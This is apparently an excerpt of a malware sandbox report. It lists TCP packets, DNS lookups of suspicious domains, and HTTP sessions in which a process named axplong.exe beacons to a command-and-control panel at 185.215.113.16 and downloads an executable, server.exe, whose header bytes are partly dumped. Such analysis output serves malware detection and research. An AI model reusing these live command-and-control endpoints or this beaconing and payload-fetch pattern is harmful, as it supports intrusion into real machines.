Jul 26, 2024 12:57:52.753845930 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753855944 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753866911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753875971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753882885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753897905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753907919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753912926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753920078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753928900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753933907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753945112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753951073 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753961086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753968000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753977060 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753982067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.753993034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.753998995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754008055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754019022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754034996 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754050016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754679918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754697084 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754710913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754725933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754728079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754741907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754744053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754756927 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754767895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754772902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754787922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754793882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754802942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754818916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754820108 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754834890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754837036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754852057 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.754857063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754873991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.754889011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.758138895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.758187056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.758193016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.758209944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.758236885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.758251905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.758358955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.758373976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.758388996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.758397102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.758400917 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.758424044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.844563961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.844588995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.844605923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.844620943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.844636917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.844649076 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.844654083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.844666958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.844671011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.844683886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.844715118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845215082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845230103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845247030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845261097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845263004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845279932 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845285892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845295906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845308065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845310926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845325947 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845333099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845345020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845360041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845361948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845376015 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845381975 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845407009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845421076 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845649004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845664978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845679998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845691919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845695972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845705032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845711946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845721006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845727921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845733881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845745087 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845753908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845761061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845772982 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845777035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845782995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845793009 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845802069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845809937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845818996 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845824957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845828056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845840931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.845855951 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845865011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.845884085 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846760035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846776009 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846791029 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846806049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846812010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846822023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846839905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846839905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846841097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846853018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846854925 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846865892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846873045 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846879005 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846889019 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846904039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846911907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846920013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846926928 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846936941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846952915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.846963882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846975088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.846997023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847541094 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847557068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847572088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847587109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847589016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847601891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847609043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847618103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847629070 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847634077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847649097 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847655058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847665071 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847677946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847677946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847692966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847704887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847709894 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847723961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847728968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847740889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.847749949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847765923 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.847780943 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851309061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851325035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851340055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851355076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851368904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851382017 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851385117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851399899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851406097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851414919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851423979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851430893 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851445913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851459026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851463079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851478100 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851488113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851502895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851509094 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851517916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851530075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851535082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851545095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851558924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851562023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851572037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851576090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851591110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851600885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851605892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851618052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851622105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851636887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851640940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851651907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.851656914 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.851666927 CEST	60836	80	192.168.2.6	198.46.178.145

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 12:56:40.796802998 CEST	192.168.2.6	1.1.1.1	0x619a	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 26, 2024 12:56:42.484379053 CEST	192.168.2.6	1.1.1.1	0xcb6d	Standard query (0)	157.123.68.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 26, 2024 12:57:11.118685961 CEST	192.168.2.6	1.1.1.1	0x2a7d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:57:23.710051060 CEST	192.168.2.6	1.1.1.1	0x3466	Standard query (0)	vaniloin.fun	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:58:01.284729958 CEST	192.168.2.6	1.1.1.1	0xcce0	Standard query (0)	arpdabl.zapto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 12:56:40.805315018 CEST	1.1.1.1	192.168.2.6	0x619a	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 26, 2024 12:56:42.492301941 CEST	1.1.1.1	192.168.2.6	0xcb6d	Name error (3)	157.123.68.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 26, 2024 12:57:11.126487017 CEST	1.1.1.1	192.168.2.6	0x2a7d	No error (0)	steamcommunity.com		23.192.247.89	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:57:23.727682114 CEST	1.1.1.1	192.168.2.6	0x3466	No error (0)	vaniloin.fun		104.21.72.79	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:57:23.727682114 CEST	1.1.1.1	192.168.2.6	0x3466	No error (0)	vaniloin.fun		172.67.177.136	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:58:01.298492908 CEST	1.1.1.1	192.168.2.6	0xcce0	No error (0)	arpdabl.zapto.org		77.91.101.71	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	60778	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:03.009041071 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:03.819545984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:03.828130960 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:04.096501112 CEST	401	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 64 33 0d 0a 20 3c 63 3e 31 30 30 30 30 31 39 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 33 30 66 39 65 66 65 63 62 36 35 38 32 35 65 62 66 63 36 33 23 31 30 30 30 30 32 30 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 31 65 39 66 34 66 36 62 37 37 35 33 39 62 65 62 36 33 32 33 65 32 32 38 38 33 33 63 31 30 66 65 33 65 62 33 39 66 31 63 61 66 66 62 38 31 33 38 32 61 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d3 <c>1000019001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730f9efecb65825ebfc63#1000020001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a721e9f4f6b77539beb6323e228833c10fe3eb39f1caffb81382ae#<d>0
Jul 26, 2024 12:57:04.098330975 CEST	54	OUT	GET /inc/server.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 12:57:04.345313072 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:04 GMT Content-Type: application/octet-stream Content-Length: 2711040 Last-Modified: Fri, 26 Jul 2024 09:19:06 GMT Connection: keep-alive ETag: "66a36a0a-295e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 20 50 a2 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 0e 27 00 00 5a 29 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 30 00 00 04 00 00 71 45 2a 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 2f 00 0c 05 00 00 00 10 30 00 38 01 00 00 00 e0 28 00 8c 4c 00 00 00 00 00 00 00 00 00 00 00 20 30 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd Pf.$'Z)`@00qE*` /08(L 0 ((X/.text''``.data ''@.rdata('@@.pdataL(N(@@.xdataA0)B)@@.bss^).idata/N)@.CRTX/T)@.tls0V)@.rsrc80X)@@.reloc 0Z)@B
Jul 26, 2024 12:57:04.345663071 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 48 89 e5 48 89 4d 10 48 89 55 18 4c 89 45 20 44 89 4d 28 90 5d c3 55 48 Data Ascii: UHHMHULE DM(]UHH o)H/(tG';''H('H(&HG(uH(H+'H ]UHH0EH(=
Jul 26, 2024 12:57:04.345673084 CEST	1236	IN	Data Raw: 48 8b 44 24 78 48 8b 8c 24 90 00 00 00 48 8b 09 48 89 4c 24 68 48 8b 48 08 48 8b 00 48 39 c1 48 89 44 24 70 0f 8f 17 00 00 00 48 8b 4c 24 78 e8 93 ee 01 00 48 8b 44 24 78 48 8b 00 48 89 44 24 70 48 8b 44 24 70 48 89 44 24 60 8b 0d 44 0d 27 00 8b Data Ascii: HD$xH$HHL$hHHHH9HD$pHL$xHD$xHHD$pHD$pHD$`D'B'qbAEAA7jPE1AD!!5q<\1j175K]9KLD$`HT$hL$HL$xD'D'5nvQA1D
Jul 26, 2024 12:57:04.347448111 CEST	1236	IN	Data Raw: 44 24 78 48 8b 54 24 30 48 8b 40 10 49 89 d2 49 c1 e2 04 49 89 c0 4d 01 d0 4d 89 08 49 89 d0 49 c1 e0 04 4c 01 c0 48 83 c0 08 48 89 08 48 b9 07 44 c0 a3 68 5a 22 5e 48 b8 06 44 c0 a3 68 5a 22 5e 48 31 c1 48 89 d0 48 01 c8 48 89 44 24 20 48 83 f2 Data Ascii: D$xHT$0H@IIIMMIILHHHDhZ"^HDhZ"^H1HHHD$ HHHHHHHDxHDxH1H9SM'K'5V.R1%=hgHL$x'5F.X15
Jul 26, 2024 12:57:04.347455978 CEST	1236	IN	Data Raw: 81 f1 d2 c2 f9 7e 45 31 c8 2d 99 3d e6 2b 44 29 c0 05 99 3d e6 2b 05 a0 b0 31 60 41 b8 b1 d3 01 e8 41 81 f0 68 b6 1f 18 41 0f af c0 41 b8 29 96 5a 2c 41 81 f0 77 58 64 c6 41 0f af c0 48 8b 09 48 89 4c 24 40 48 8b 4a 08 48 8b 12 48 89 54 24 48 48 Data Ascii: ~E1-=+D)=+1`AAhAA)Z,AwXdAHHL$@HJHHT$HH9L$W=.yHD$HL$WHD$88'5u')v0)1tP=f1!^^=L;~H$DR'
Jul 26, 2024 12:57:04.349503994 CEST	1236	IN	Data Raw: 85 ff 26 00 35 d2 5d e1 31 8b 0d 7e ff 26 00 ba 5b bb 9f 44 81 f2 82 60 00 61 31 d1 21 c8 69 c0 60 68 e5 55 69 c8 e7 99 81 27 ba 36 30 6e 7a 81 f2 40 3f 3d 41 89 c8 21 d0 81 c9 76 0f 53 3b 01 c8 3d 40 6d 81 6c 0f 82 4e 02 00 00 48 8b 8c 24 88 00 Data Ascii: &5]1~&[D`a1!i`hUi'60nz@?=A!vS;=@mlNH$7&5&AfADND!A'JbAD1AA"N-D!5DY0.{Rm)D$4H$D$4HHL$8=XHD$8HD$HHT$@LL
Jul 26, 2024 12:57:04.349513054 CEST	1236	IN	Data Raw: 71 1f 30 f0 39 c8 0f 87 e1 01 00 00 48 8b 4c 24 70 8b 05 c6 fa 26 00 35 bb 3f 3b 96 0b 05 bf fa 26 00 41 b9 ff ff ff ff 41 81 f1 cb d5 cb 7d 41 89 c0 45 21 c8 89 c2 44 09 ca 83 f2 ff 41 0f af d0 41 89 c0 41 81 e0 cb d5 cb 7d 41 b9 41 31 97 48 41 Data Ascii: q09HL$p&5?;&AA}AE!DAAA}AA1HA\5DAV@1h)0] 1HH8HT$8HI8HL$@HL$O=4GD$O3HD$hHL$@HHL$(HHHH9HD$0HL$hHD$hHHD
